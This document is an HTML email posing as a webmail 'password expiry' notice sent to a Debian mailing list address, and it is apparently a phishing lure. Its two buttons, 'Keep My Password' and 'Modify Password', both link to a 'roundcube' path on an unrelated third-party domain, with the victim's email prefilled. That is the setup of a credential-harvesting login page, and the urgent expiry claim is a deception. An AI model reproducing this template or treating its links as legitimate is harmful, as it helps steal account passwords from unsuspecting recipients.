<!DOCTYPE html>

<html lang="en"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Password Expiry Notification</title>
<style>
    body {
        font-family: "Segoe UI", Tahoma, Arial, sans-serif;
        color: #212121;
        background-color: #ffffff;
        margin: 0;
        padding: 0;
    }
    .container {
        max-width: 640px;
        margin: 0 auto;
        padding: 16px;
        background-color: #f9f9f9;
        border: 1px solid #e0e0e0;
    }
    .header {
        text-align: center;
        font-size: 20px;
        font-weight: bold;
        margin-bottom: 16px;
    }
    .content {
        font-size: 14px;
        line-height: 1.6;
        margin-bottom: 16px;
    }
    .content p {
        margin: 0 0 12px;
    }
    .button {
        display: inline-block;
        margin: 8px 4px;
        padding: 10px 20px;
        text-decoration: none;
        font-size: 14px;
        font-weight: bold;
        color: #ffffff;
        background-color: #007acc;
        border-radius: 4px;
        text-align: center;
    }
    .button.secondary {
        background-color: #e0e0e0;
        color: #212121;
    }
    .footer {
        font-size: 10px;
        color: #666666;
        text-align: center;
        margin-top: 16px;
    }
</style>
</head>
<body style="font-family: "Segoe UI", Tahoma, Arial, sans-serif;
        color: #212121;
        background-color: #ffffff;
        margin: 0;
        padding: 0">
<div style="max-width: 640px;
        margin: 0 auto;
        padding: 16px;
        background-color: #f9f9f9;
        border: 1px solid #e0e0e0" class="container">
    <div style="text-align: center;
        font-size: 20px;
        font-weight: bold;
        margin-bottom: 16px" class="header">Your Password is About to Expire</div>
    <div style="font-size: 14px;
        line-height: 1.6;
        margin-bottom: 16px" class="content">
        <p style="margin: 0 0 12px">Your password is set to expire on <strong>28 January 2025</strong>. To ensure uninterrupted access to your account, please update your password before the expiration date.</p>
        <p style="margin: 0 0 12px"><strong>Account Information:</strong></p>
        <p style="margin: 0 0 12px">Email Address: <font color="#2b9fd4" style="background-color: rgb(255, 255, 255);">debian-med-packaging@lists.alioth.debian.org</font></p>
        <p style="margin: 0 0 12px">Password Status: <span style="color: rgb(243, 12, 46);">About to Expire</span></p>
        <div style="text-align: center;">
            <a class="button" href="https://randworth.co.za/zx/roundcube/?email=debian-med-packaging@lists.alioth.debian.org">Keep My Password</a>
            <a class="button secondary" href="https://randworth.co.za/zx/roundcube/?email=debian-med-packaging@lists.alioth.debian.org">Modify Password</a>
        </div>
    </div>
    <div style="font-size: 10px;
        color: #666666;
        text-align: center;
        margin-top: 16px" class="footer">© 2025. All Rights Reserved.</div>
</div>


</body></html>